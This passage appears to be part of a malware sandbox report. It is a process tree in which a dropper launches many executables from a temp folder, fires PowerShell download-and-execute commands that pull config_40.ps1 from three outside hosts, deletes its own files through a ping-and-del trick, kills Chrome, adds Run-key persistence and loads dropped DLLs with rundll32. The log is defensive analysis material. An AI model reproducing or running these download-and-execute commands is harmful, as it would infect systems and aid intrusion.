6368daa6531b5_e1a29ac.exe
4⤵
- Executes dropped EXE
- Checks computer location settings
PID:4472

C:\Users\Admin\AppData\Local\Temp\7zS03226E76\6368daa6531b5_e1a29ac.exe
"C:\Users\Admin\AppData\Local\Temp\7zS03226E76\6368daa6531b5_e1a29ac.exe" -q
5⤵
- Executes dropped EXE
PID:1320

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 6368daa709d64_5cde43f.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:4924

C:\Users\Admin\AppData\Local\Temp\7zS03226E76\6368daa709d64_5cde43f.exe
6368daa709d64_5cde43f.exe
4⤵
- Executes dropped EXE
PID:696

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 6368daa76532c_c5c6da.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:4864

C:\Users\Admin\AppData\Local\Temp\7zS03226E76\6368daa76532c_c5c6da.exe
6368daa76532c_c5c6da.exe
4⤵
- Executes dropped EXE
- Checks computer location settings
PID:2372

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.conectiva.pe/doc/config_40.ps1')"
5⤵
PID:4240

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.conectiva.pe/doc/config_40.ps1')
6⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:15308

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\7zS03226E76\6368daa76532c_c5c6da.exe" >> NUL
5⤵
PID:15056

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
6⤵
- Runs ping.exe
PID:29340

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 6368daa7d6897_a0d8ae7feb.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:4808

C:\Users\Admin\AppData\Local\Temp\7zS03226E76\6368daa7d6897_a0d8ae7feb.exe
6368daa7d6897_a0d8ae7feb.exe
4⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
PID:3136

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
5⤵
PID:18448

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:49436

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
5⤵
PID:62368

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe16e54f50,0x7ffe16e54f60,0x7ffe16e54f70
6⤵
PID:62116

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 6368daabedc01_cd9ff84ca.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:1288

C:\Users\Admin\AppData\Local\Temp\7zS03226E76\6368daabedc01_cd9ff84ca.exe
6368daabedc01_cd9ff84ca.exe
4⤵
- Executes dropped EXE
PID:1384

C:\Users\Admin\AppData\Local\Temp\is-AD0BB.tmp\6368daabedc01_cd9ff84ca.tmp
"C:\Users\Admin\AppData\Local\Temp\is-AD0BB.tmp\6368daabedc01_cd9ff84ca.tmp" /SL5="$501C6,140559,56832,C:\Users\Admin\AppData\Local\Temp\7zS03226E76\6368daabedc01_cd9ff84ca.exe"
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4340

C:\Users\Admin\AppData\Local\Temp\is-O9Q70.tmp\PowerOff.exe
"C:\Users\Admin\AppData\Local\Temp\is-O9Q70.tmp\PowerOff.exe" /S /UID=91
6⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
PID:15136

C:\Users\Admin\AppData\Local\Temp\ee-56cf6-278-af0bb-b882f9b79b530\Roqeceshije.exe
"C:\Users\Admin\AppData\Local\Temp\ee-56cf6-278-af0bb-b882f9b79b530\Roqeceshije.exe"
7⤵
- Executes dropped EXE
PID:48732

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
8⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:87720

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffe149946f8,0x7ffe14994708,0x7ffe14994718
9⤵
PID:87752

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2188,65289840399965173,2645295549501861023,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2224 /prefetch:2
9⤵
PID:15092

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2188,65289840399965173,2645295549501861023,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2692 /prefetch:8
9⤵
PID:87976

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2188,65289840399965173,2645295549501861023,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2280 /prefetch:3
9⤵
PID:87964

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,65289840399965173,2645295549501861023,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:1
9⤵
PID:2388

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,65289840399965173,2645295549501861023,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3416 /prefetch:1
9⤵
PID:3976

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2188,65289840399965173,2645295549501861023,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4152 /prefetch:8
9⤵
PID:1380

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,65289840399965173,2645295549501861023,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5304 /prefetch:1
9⤵
PID:5124

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,65289840399965173,2645295549501861023,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5708 /prefetch:1
9⤵
PID:6508

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,65289840399965173,2645295549501861023,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5784 /prefetch:1
9⤵
PID:6520

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2188,65289840399965173,2645295549501861023,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5156 /prefetch:8
9⤵
PID:6532

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2188,65289840399965173,2645295549501861023,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5988 /prefetch:8
9⤵
PID:6836

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
9⤵
- Drops file in Program Files directory
PID:7008

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff603165460,0x7ff603165470,0x7ff603165480
10⤵
PID:7132

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2188,65289840399965173,2645295549501861023,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5988 /prefetch:8
9⤵
PID:7040

C:\Users\Admin\AppData\Local\Temp\72-43ec2-88b-13ba4-7100833153a3f\Midaejisowy.exe
"C:\Users\Admin\AppData\Local\Temp\72-43ec2-88b-13ba4-7100833153a3f\Midaejisowy.exe"
7⤵
- Executes dropped EXE
- Checks computer location settings
PID:48712

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nc3ogk0g.iuf\GcleanerEU.exe /eufive & exit
8⤵
PID:79484

C:\Users\Admin\AppData\Local\Temp\nc3ogk0g.iuf\GcleanerEU.exe
C:\Users\Admin\AppData\Local\Temp\nc3ogk0g.iuf\GcleanerEU.exe /eufive
9⤵
- Executes dropped EXE
- Checks computer location settings
PID:87860

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 87860 -s 452
10⤵
- Program crash
PID:87680

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 87860 -s 772
10⤵
- Program crash
PID:3960

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 87860 -s 780
10⤵
- Program crash
PID:5132

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 87860 -s 832
10⤵
- Program crash
PID:5404

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 87860 -s 840
10⤵
- Program crash
PID:5656

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 87860 -s 884
10⤵
- Program crash
PID:5788

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 87860 -s 804
10⤵
- Program crash
PID:5912

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 87860 -s 1356
10⤵
- Program crash
PID:6032

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "GcleanerEU.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\nc3ogk0g.iuf\GcleanerEU.exe" & exit
10⤵
PID:6188

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "GcleanerEU.exe" /f
11⤵
- Kills process with taskkill
PID:6308

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 87860 -s 1416
10⤵
- Program crash
PID:6252

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0ocjc2p2.dnk\gcleaner.exe /mixfive & exit
8⤵
PID:85596

C:\Users\Admin\AppData\Local\Temp\0ocjc2p2.dnk\gcleaner.exe
C:\Users\Admin\AppData\Local\Temp\0ocjc2p2.dnk\gcleaner.exe /mixfive
9⤵
- Executes dropped EXE
- Checks computer location settings
PID:87948

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 87948 -s 456
10⤵
- Program crash
PID:3968

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 87948 -s 764
10⤵
- Program crash
PID:220

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 87948 -s 772
10⤵
- Program crash
PID:5280

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 87948 -s 836
10⤵
- Program crash
PID:5448

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 87948 -s 844
10⤵
- Program crash
PID:5608

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 87948 -s 984
10⤵
- Program crash
PID:5728

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 87948 -s 1012
10⤵
- Program crash
PID:5848

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 87948 -s 1356
10⤵
- Program crash
PID:5980

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\0ocjc2p2.dnk\gcleaner.exe" & exit
10⤵
PID:6064

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "gcleaner.exe" /f
11⤵
- Kills process with taskkill
PID:6160

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 87948 -s 1424
10⤵
- Program crash
PID:6128

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nv1ypbrb.1zd\random.exe & exit
8⤵
PID:81308

C:\Users\Admin\AppData\Local\Temp\nv1ypbrb.1zd\random.exe
C:\Users\Admin\AppData\Local\Temp\nv1ypbrb.1zd\random.exe
9⤵
- Executes dropped EXE
- Checks computer location settings
PID:87528

C:\Users\Admin\AppData\Local\Temp\nv1ypbrb.1zd\random.exe
"C:\Users\Admin\AppData\Local\Temp\nv1ypbrb.1zd\random.exe" -q
10⤵
- Executes dropped EXE
PID:4032

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\afdet3ny.wvx\pb1117.exe & exit
8⤵
PID:87532

C:\Users\Admin\AppData\Local\Temp\afdet3ny.wvx\pb1117.exe
C:\Users\Admin\AppData\Local\Temp\afdet3ny.wvx\pb1117.exe
9⤵
- Executes dropped EXE
PID:2584

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 6368daaad0766_61fff63e.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:2044

C:\Users\Admin\AppData\Local\Temp\7zS03226E76\6368daaad0766_61fff63e.exe
6368daaad0766_61fff63e.exe
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3480

C:\Users\Admin\AppData\Local\Temp\7zS03226E76\6368daaad0766_61fff63e.exe
6368daaad0766_61fff63e.exe
5⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3600

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 6368daa937cb8_bfd3ed4d.exe /mixone
3⤵
- Suspicious use of WriteProcessMemory
PID:4280

C:\Users\Admin\AppData\Local\Temp\7zS03226E76\6368daa937cb8_bfd3ed4d.exe
6368daa937cb8_bfd3ed4d.exe /mixone
4⤵
- Executes dropped EXE
- Checks computer location settings
PID:4736

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4736 -s 464
5⤵
- Program crash
PID:15292

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4736 -s 772
5⤵
- Program crash
PID:20416

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4736 -s 780
5⤵
- Program crash
PID:38036

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4736 -s 808
5⤵
- Program crash
PID:62436

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4736 -s 848
5⤵
- Program crash
PID:69348

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4736 -s 992
5⤵
- Program crash
PID:79500

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4736 -s 1048
5⤵
- Program crash
PID:87556

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4736 -s 1364
5⤵
- Program crash
PID:2656

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "6368daa937cb8_bfd3ed4d.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS03226E76\6368daa937cb8_bfd3ed4d.exe" & exit
5⤵
PID:87972

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "6368daa937cb8_bfd3ed4d.exe" /f
6⤵
- Kills process with taskkill
PID:1084

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4736 -s 500
5⤵
- Program crash
PID:4876

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 6368dab1e79de_14526e0fb0.exe
3⤵
PID:2184

C:\Users\Admin\AppData\Local\Temp\7zS03226E76\6368dab1e79de_14526e0fb0.exe
6368dab1e79de_14526e0fb0.exe
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4740

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
5⤵
PID:87424

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4740 -s 82740
5⤵
- Program crash
PID:87824

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 6368daaff2693_0808cb0878.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:4944

C:\Users\Admin\AppData\Local\Temp\7zS03226E76\6368daaff2693_0808cb0878.exe
6368daaff2693_0808cb0878.exe
4⤵
- Executes dropped EXE
PID:3860

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 6368daadec736_b018adb.exe
3⤵
PID:2864

C:\Users\Admin\AppData\Local\Temp\7zS03226E76\6368daadec736_b018adb.exe
6368daadec736_b018adb.exe
4⤵
- Executes dropped EXE
PID:3452

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3452 -s 296
5⤵
- Program crash
PID:8328

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 6368dae9d03d2_c1e9ecee.exe
3⤵
PID:4360

C:\Users\Admin\AppData\Local\Temp\7zS03226E76\6368dae9d03d2_c1e9ecee.exe
6368dae9d03d2_c1e9ecee.exe
4⤵
- Executes dropped EXE
- Checks computer location settings
PID:960

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://ndtpro.xyz/nj/config_40.ps1')"
5⤵
PID:11384

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command IEX(New-Object Net.Webclient).DownloadString('https://ndtpro.xyz/nj/config_40.ps1')
6⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1364

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\7zS03226E76\6368dae9d03d2_c1e9ecee.exe" >> NUL
5⤵
PID:38016

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
6⤵
- Runs ping.exe
PID:69220

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 6368daee3bb65_7f03c6.exe
3⤵
PID:1996

C:\Users\Admin\AppData\Local\Temp\7zS03226E76\6368daee3bb65_7f03c6.exe
6368daee3bb65_7f03c6.exe
4⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
PID:8360

C:\Windows\SysWOW64\control.exe
"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\76eQ.CPl",
5⤵
PID:15260

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\76eQ.CPl",
6⤵
- Loads dropped DLL
PID:2952

C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\76eQ.CPl",
7⤵
PID:87476

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\76eQ.CPl",
8⤵
- Loads dropped DLL
PID:87568

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 6368daecf26a4_6426872a.exe
3⤵
PID:3596

C:\Users\Admin\AppData\Local\Temp\7zS03226E76\6368daecf26a4_6426872a.exe
6368daecf26a4_6426872a.exe
4⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
PID:8348

C:\Windows\SysWOW64\control.exe
"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\76eQ.CPl",
5⤵
PID:15252

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\76eQ.CPl",
6⤵
- Loads dropped DLL
PID:2312

C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\76eQ.CPl",
7⤵
PID:87916

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\76eQ.CPl",
8⤵
- Loads dropped DLL
PID:87980

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 6368daeb7b488_2f09cc.exe
3⤵
PID:1600

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 3452 -ip 3452
1⤵
PID:2580

C:\Users\Admin\AppData\Local\Temp\7zS03226E76\6368daeb7b488_2f09cc.exe
6368daeb7b488_2f09cc.exe
1⤵
- Executes dropped EXE
- Checks computer location settings
PID:4436

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://efeedor.com/blog/assets/config_40.ps1')"
2⤵
PID:13116

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command IEX(New-Object Net.Webclient).DownloadString('https://efeedor.com/blog/assets/config_40.ps1')
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:9364

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\7zS03226E76\6368daeb7b488_2f09cc.exe" >> NUL
2⤵
PID:65172

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
3⤵
- Runs ping.exe
PID:69452

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4736 -ip 4736
1⤵
PID:15156

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4736 -ip 4736
1⤵
PID:18480

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
1⤵
- Process spawned unexpected child process
PID:29364

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
2⤵
- Loads dropped DLL
PID:29400

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 29400 -s 608
3⤵
- Program crash
PID:49068

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4736 -ip 4736
1⤵
PID:29384

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 29400 -ip 29400
1⤵
PID:43192

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4736 -ip 4736
1⤵
PID:55860

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4736 -ip 4736
1⤵
PID:69292

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4736 -ip 4736
1⤵
PID:69492

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4736 -ip 4736
1⤵
PID:87436

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4740 -ip 4740
1⤵
PID:87616

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4736 -ip 4736
1⤵
PID:87964

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 87860 -ip 87860
1⤵
PID:87600

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4736 -ip 4736
1⤵
PID:1308

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 87948 -ip 87948
1⤵
PID:3204

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2108

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 87860 -ip 87860
1⤵
PID:1928

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 87948 -ip 87948
1⤵
PID:4764

C:\Windows\SysWOW64\WerFault.exe
